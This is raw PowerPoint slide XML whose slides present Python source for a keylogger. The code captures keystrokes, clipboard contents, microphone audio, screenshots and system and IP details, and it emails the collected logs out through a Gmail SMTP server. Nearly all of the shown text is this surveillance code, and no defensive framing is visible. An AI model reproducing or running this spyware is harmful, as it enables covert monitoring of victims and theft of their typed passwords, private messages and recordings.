            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>file_merge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> + extend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1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5446" y="436094"/>
            <a:ext cx="3106272" cy="5579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00" b="1" dirty="0"/>
              <a:t># get the computer information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>computer_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    with open(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system_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, "a") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        hostname = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>socket.gethostname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IPAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>socket.gethostbyname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(hostname)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        try: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public_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = get("https://api.ipify.org").text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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Public IP Address: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>public_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        except Exception: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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Couldn't get Public IP Address (most likely max query")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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Processor: " + (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>platform.processor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>()) + '\n')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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("System: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>platform.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>() + " " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>platform.version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>() + '\n')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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Machine: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>platform.machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>() + "\n")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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Hostname: " + hostname + "\n")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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Private IP Address: " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>IPAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> + "\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>computer_information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 err="1"/>
              <a:t>copy_clipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>()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736D525-61FB-2EAC-219A-26FC01A61E75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7422778" y="436094"/>
            <a:ext cx="3993776" cy="557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900" b="1" dirty="0"/>
              <a:t># email controls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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>send_email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(filename, attachment, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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fromaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>email_address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 = MIMEMultipart()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['From'] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>fromaddr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['To'] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>['Subject'] = "Log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body = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>Body_of_the_mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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msg.attach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(MIMEText(body, 'plain'))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filename = filename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attachment = open(attachment, 'rb')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p = MIMEBase('application', 'octet-stream')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p.set_payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>attachment.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty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encoders.encode_base64(p)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p.add_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>('Content-Disposition', "attachment; filename= %s" % filename)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msg.attach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>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s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>smtplib.SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>('smtp.gmail.com', 587)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/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>s.starttls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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 err="1"/>
              <a:t>s.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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900" dirty="0" err="1"/>
              <a:t>send_email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, 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keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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9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03332AD-C1E5-A941-C078-CA0785A550EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="436094"/>
            <a:ext cx="3200400" cy="583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900" b="1" dirty="0"/>
              <a:t># get the clipboard contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>copy_clipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    with open(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clipboard_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, "a") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            win32clipboard.OpenClipboard()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pasted_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = win32clipboard.GetClipboardData()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            win32clipboard.CloseClipboard()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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Clipboard Data: \n" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>pasted_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            print("\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        except: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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Clipboard could be not be copied")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            print("\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>copy_clipboard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b="1" dirty="0"/>
              <a:t># get the microphone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def microphone():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    fs = 44100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    seconds = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>microphone_time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myrecording</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>sd.rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(int(seconds * fs), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>samplerate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>=fs, channels=2)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sd.wait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write(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audio_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, fs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>myrecording</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>microphone()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291043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1234" y="462423"/>
            <a:ext cx="3106272" cy="5579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00" dirty="0"/>
              <a:t># get screenshots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def screenshot():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im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>ImageGrab.grab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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>im.save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>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screenshot_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>screenshot()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>number_of_iterations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>currentTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time.time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 err="1"/>
              <a:t>stoppingTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time.time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time_iteration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0"/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/>
              <a:t># Timer for keylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>number_of_iterations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>number_of_iterations_end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    count = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    keys = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        global keys, count, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>currentTime</a:t>
            </a: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print(key)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keys.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        count += 1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currentTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time.time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    if count &gt;= 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            count = 0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write_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(keys)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            keys = []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03332AD-C1E5-A941-C078-CA0785A550EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5788958" y="450847"/>
            <a:ext cx="4728883" cy="583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900" dirty="0"/>
              <a:t> def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>write_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(keys):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        with open(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keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, "a") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            for key in keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>                k = str(key).replace("'", "")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>                if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>k.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("space") &gt; 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>('\n')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>f.close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            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>k.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Key") == -1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(k)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>f.close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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        if key == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>Key.esc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            return False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>currentTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stoppingTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            return False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    with Listener(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>) as listener: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listener.join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r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>currentTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stoppingTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        with open(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keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, "w") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(" ")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
